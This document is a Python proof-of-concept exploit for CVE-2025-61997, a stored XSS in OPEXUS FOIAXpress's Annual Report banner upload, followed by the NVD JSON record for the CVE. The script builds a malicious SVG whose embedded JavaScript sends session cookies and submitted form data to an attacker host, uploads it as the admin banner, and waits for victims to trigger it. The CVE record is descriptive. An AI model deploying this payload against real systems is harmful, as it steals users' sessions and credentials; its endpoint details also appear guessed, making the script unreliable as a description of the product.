CVE-2025-61997

# CVE-2025-61997 - OPEXUS FOIAXpress Stored XSS PoC # Vulnerability: Stored XSS via Annual Report Enterprise Banner image upload import requests TARGET_URL = "https://target-foiaxpress-server.com" ADMIN_SESSION = "admin_session_cookie_here" # Step 1: Login as administrator (requires valid admin credentials) def login_as_admin(session, username, password): """Authenticate to FOIAXpress as an administrator user""" login_url = f"{TARGET_URL}/login" credentials = { "username": username, "password": password } response = session.post(login_url, data=credentials) return response.status_code == 200 # Step 2: Create a malicious payload disguised as an image file def create_malicious_banner(): """Create a malicious SVG file containing XSS payload""" # SVG format supports embedded JavaScript, which can bypass # simple file extension validation malicious_svg = """<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 200 200"> <script type="text/javascript"> // XSS Payload: Steal session cookies and credentials var sessionData = document.cookie; var exfilUrl = "https://attacker-server.com/collect?data=" + encodeURIComponent(sessionData); // Create an image request to exfiltrate data new Image().src = exfilUrl; // Additional payload: steal form data document.querySelectorAll('form').forEach(function(form) { form.addEventListener('submit', function(e) { var formData = new FormData(form); var params = new URLSearchParams(formData).toString(); new Image().src = "https://attacker-server.com/collect?form=" + encodeURIComponent(params); }); }); </script> <rect x="0" y="0" width="200" height="200" fill="blue"/> <text x="50" y="100" fill="white">Enterprise Banner</text> </svg>""" return malicious_svg # Step 3: Upload the malicious file as Enterprise Banner def upload_malicious_banner(session): """Upload the malicious banner to the Annual Report configuration""" upload_url = f"{TARGET_URL}/annual-report/enterprise-banner-upload" malicious_content = create_malicious_banner() files = { "banner_image": ("banner.svg", malicious_content, "image/svg+xml") } response = session.post(upload_url, files=files) if response.status_code == 200: print("[+] Malicious banner uploaded successfully") print("[+] Payload will execute when any user generates an Annual Report") return response.status_code == 200 # Step 4: Trigger execution (when a victim generates an Annual Report) # The malicious script will execute in the victim's browser context if __name__ == "__main__": session = requests.Session() session.headers.update({"Cookie": f"session={ADMIN_SESSION}"}) # Upload malicious banner if upload_malicious_banner(session): print("[+] Exploit deployed. Waiting for victim to trigger...") print("[+] When any user generates an Annual Report,") print("[+] the malicious JavaScript will execute in their browser context.")

{"cve": {"id": "CVE-2025-61997", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-08T00:15:34.070", "lastModified": "2025-10-22T14:45:25.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content within the Annual Report Enterprise Banner image upload field. Injected content is executed in the context of other users when they generate an Annual Report. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.13.3.0", "matchCriteriaId": "7077A02D-D6F5-4E4E-B6A4-E2D8AFBF8EAC"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-61997", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}